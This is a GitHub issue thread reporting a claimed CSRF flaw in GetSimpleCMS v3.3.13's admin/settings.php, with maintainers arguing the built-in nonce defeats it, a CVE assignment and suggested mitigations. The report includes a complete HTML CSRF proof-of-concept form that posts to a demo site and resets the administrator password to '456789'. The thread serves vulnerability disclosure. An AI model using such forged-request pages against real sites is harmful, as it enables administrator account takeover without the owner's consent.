Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

GetSimpleCMS v3.3.13 allows CSRF to change the administrator account's password. in admin/settings.php #1295

Open
AutismJH opened this issue Aug 24, 2018 · 9 comments
Labels

Comments

@AutismJH
Copy link

GetSimpleCMS v3.3.13 allows CSRF to change the administrator account's pssword.
After the administrator login in,open the poc,the administrator account's password will been changed to 456789.
POC:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://s1.demo.opensourcecms.com/getsimple/admin/settings.php" method="POST">
      <input type="hidden" name="nonce" value="a609cbb2d8a13520d33d5f28b1fa50027d6085cc" />
      <input type="hidden" name="sitename" value="GetSimple" />
      <input type="hidden" name="siteurl" value="https&#58;&#47;&#47;s1&#46;demo&#46;opensourcecms&#46;com&#47;getsimple&#47;" />
      <input type="hidden" name="permalink" value="" />
      <input type="hidden" name="user" value="opensourcecms" />
      <input type="hidden" name="email" value="cms&#64;gfdk&#46;org" />
      <input type="hidden" name="name" value="" />
      <input type="hidden" name="timezone" value="Europe&#47;Brussels" />
      <input type="hidden" name="lang" value="en&#95;US" />
      <input type="hidden" name="show&#95;htmleditor" value="1" />
      <input type="hidden" name="sitepwd" value="456789" />
      <input type="hidden" name="sitepwd&#95;confirm" value="456789" />
      <input type="hidden" name="submitted" value="Save&#32;Settings" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
@cnb
Copy link
Contributor

cnb commented Aug 24, 2018

You have to know the administrator's account name.
And even if you know it, you get CSRF detected! error (and the password isn't changed)

@AutismJH
Copy link
Author

I can change your username in my POC package, in the user section, even without your administrator's account. I can also change it.

@tablatronix
Copy link
Member

With the nonce...

@AutismJH
Copy link
Author

CSRF (Cross-site request forgery) cross-site request forgery, because the target station has no token/referer restrictions, the attacker can complete the operation as a user to achieve various purposes. You can check the token's verification, or the refer header's detection, or add a verification code. After all, there is always no harm.

@tablatronix
Copy link
Member

There already is a nonce, its in your poc and why your poc will fail always.

@tablatronix
Copy link
Member

tablatronix commented Aug 25, 2018

Refs
#1056
Oops thats for api

I thought we had a milestone for csrf refferer checking and cors somewhere

@fgeek
Copy link

fgeek commented Oct 1, 2018

CVE-2018-17103 has been assigned for this issue.

@tablatronix
Copy link
Member

tablatronix commented Oct 1, 2018

I am tempted to close this and ignore it, it requires priv escalation and a nonce

@tablatronix
Copy link
Member

tablatronix commented May 24, 2019

Mitigation

  • use password auth for change password
  • add secondary confirm

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Projects
None yet
Development

No branches or pull requests

4 participants